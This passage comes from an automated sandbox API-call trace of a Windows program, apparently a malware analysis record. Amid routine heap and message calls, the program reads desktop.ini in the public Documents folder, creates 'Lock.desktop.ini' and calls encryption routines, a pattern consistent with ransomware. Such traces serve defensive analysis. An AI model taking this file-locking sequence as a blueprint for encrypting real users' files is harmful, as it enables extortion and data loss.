hHeap=0x970000) returned 1 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f78 | out: hHeap=0x970000) returned 1 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52060 | out: hHeap=0x970000) returned 1 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55038 | out: hHeap=0x970000) returned 1 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55068 | out: hHeap=0x970000) returned 1 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fd8 | out: hHeap=0x970000) returned 1 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54fa8 | out: hHeap=0x970000) returned 1 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55088 | out: hHeap=0x970000) returned 1 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54210 | out: hHeap=0x970000) returned 1 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e52090 | out: hHeap=0x970000) returned 1 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f28 | out: hHeap=0x970000) returned 1 [0268.837] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51eb0 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d60 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d30 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d78 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e68 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ce8 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c70 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51d90 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bc8 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dc0 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51dd8 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e38 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51df0 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51be0 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51bf8 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e08 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e50 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c10 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e98 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51fd0 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78858 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f18 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c28 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c40 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c88 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977db8 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69ba8 | out: hHeap=0x970000) returned 1 [0268.838] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51c58 | out: hHeap=0x970000) returned 1 [0268.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cb8 | out: hHeap=0x970000) returned 1 [0268.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51cd0 | out: hHeap=0x970000) returned 1 [0268.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e698c8 | out: hHeap=0x970000) returned 1 [0268.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55028 | out: hHeap=0x970000) returned 1 [0268.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14260 | out: hHeap=0x970000) returned 1 [0268.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2f153a0 [0268.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2f14d28 | out: hHeap=0x970000) returned 1 [0268.839] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550b8 [0268.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550d8 [0268.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f88 [0268.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0268.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55108 [0268.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e55108 | out: hHeap=0x970000) returned 1 [0268.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f88 | out: hHeap=0x970000) returned 1 [0268.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0268.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550d8 | out: hHeap=0x970000) returned 1 [0268.839] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550b8 | out: hHeap=0x970000) returned 1 [0268.839] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0268.840] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0268.840] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f58 [0268.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f58 | out: hHeap=0x970000) returned 1 [0268.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b08 | out: hHeap=0x970000) returned 1 [0268.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550a8 | out: hHeap=0x970000) returned 1 [0268.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51e80 | out: hHeap=0x970000) returned 1 [0268.840] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f68 [0268.840] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e550f8 [0268.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e550f8 | out: hHeap=0x970000) returned 1 [0268.840] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f68 | out: hHeap=0x970000) returned 1 [0268.841] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e55088 [0268.841] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f38 [0268.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fa8 [0268.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a68 [0268.841] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0268.841] PeekMessageW (in: lpMsg=0x8cef40, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef40) returned 0 [0268.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54fb8 [0268.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54f78 [0268.841] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0268.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51fa0 [0268.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ff8 [0268.841] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54fd8 [0268.841] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 17 [0268.842] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDestroyHash", cchWideChar=17, lpMultiByteStr=0x2e69a48, cbMultiByte=17, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDestroyHash", lpUsedDefaultChar=0x0) returned 17 [0268.842] CryptDestroyHash (hHash=0xa872d0) returned 1 [0268.842] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0268.842] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.842] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.842] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.842] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.843] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/desktop.ini" (normalized: "c:\\users\\public\\documents\\desktop.ini"), dwDesiredAccess=0x80000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2a0 [0268.848] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0268.848] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf2c0 | out: lpNewFilePointer=0x0) returned 1 [0268.848] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.848] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0268.848] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0268.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0268.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0268.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0268.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0268.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0268.848] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e98 | out: hHeap=0x970000) returned 1 [0268.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517d8 [0268.848] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0268.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0268.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b98 [0268.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0268.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x70) returned 0x2e54858 [0268.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51b98 | out: hHeap=0x970000) returned 1 [0268.849] GetFileAttributesW (lpFileName="C:\\Users\\Public\\Documents/" (normalized: "c:\\users\\public\\documents")) returned 0x11 [0268.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54858 | out: hHeap=0x970000) returned 1 [0268.849] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0268.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77688 [0268.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10000) returned 0x3be0048 [0268.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e519e8 [0268.849] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0268.849] CreateFileW (lpFileName="C:\\Users\\Public\\Documents/Lock.desktop.ini" (normalized: "c:\\users\\public\\documents\\lock.desktop.ini"), dwDesiredAccess=0xc0000000, dwShareMode=0x7, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2d0 [0269.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69bc8 [0269.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0269.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0269.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517d8 | out: hHeap=0x970000) returned 1 [0269.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0269.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0269.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0269.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0269.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0269.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0269.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.034] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77808 | out: hHeap=0x970000) returned 1 [0269.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77808 [0269.034] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.034] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51850 [0269.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51730 [0269.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0269.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51658 [0269.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0269.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0269.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0269.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0269.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.035] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0269.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51688 [0269.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e517a8 [0269.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d18 [0269.035] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x100000) returned 0x1258020 [0269.038] SetFilePointerEx (in: hFile=0x2a0, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x8cf4e4 | out: lpNewFilePointer=0x0) returned 1 [0269.038] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x116, lpOverlapped=0x0) returned 1 [0269.040] ReadFile (in: hFile=0x2a0, lpBuffer=0x2f04008, nNumberOfBytesToRead=0x10000, lpNumberOfBytesRead=0x8cf4f8, lpOverlapped=0x0 | out: lpBuffer=0x2f04008*, lpNumberOfBytesRead=0x8cf4f8*=0x0, lpOverlapped=0x0) returned 1 [0269.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517a8 | out: hHeap=0x970000) returned 1 [0269.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51688 | out: hHeap=0x970000) returned 1 [0269.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0269.040] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x116) returned 0x978328 [0269.040] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x1258020 | out: hHeap=0x970000) returned 1 [0269.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51730 | out: hHeap=0x970000) returned 1 [0269.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51658 | out: hHeap=0x970000) returned 1 [0269.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51850 | out: hHeap=0x970000) returned 1 [0269.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e517c0 | out: hHeap=0x970000) returned 1 [0269.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51af0 | out: hHeap=0x970000) returned 1 [0269.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0269.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x116) returned 0x978448 [0269.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978328 | out: hHeap=0x970000) returned 1 [0269.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0269.043] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a18 [0269.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51ac0 [0269.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0269.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0269.043] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x116) returned 0x978328 [0269.043] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978328 | out: hHeap=0x970000) returned 1 [0269.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51ac0 | out: hHeap=0x970000) returned 1 [0269.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e51a18 | out: hHeap=0x970000) returned 1 [0269.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.044] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0269.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b48 | out: hHeap=0x970000) returned 1 [0269.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0269.044] PeekMessageW (in: lpMsg=0x8cf708, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf708) returned 0 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7e9b8 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0269.044] CharUpperBuffW (in: lpsz="_CRYPT_ENCRYPTDATA", cchLength=0x12 | out: lpsz="_CRYPT_ENCRYPTDATA") returned 0x12 [0269.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7e9b8 | out: hHeap=0x970000) returned 1 [0269.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518c8 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54df8 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51910 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b38 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x116) returned 0x978328 [0269.044] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54ec8 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51b80 [0269.044] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0269.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54da8 [0269.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e51a60 [0269.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0269.045] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d18 | out: hHeap=0x970000) returned 1 [0269.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x1) returned 0x2e54db8 [0269.045] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e518e0 [0269.045] 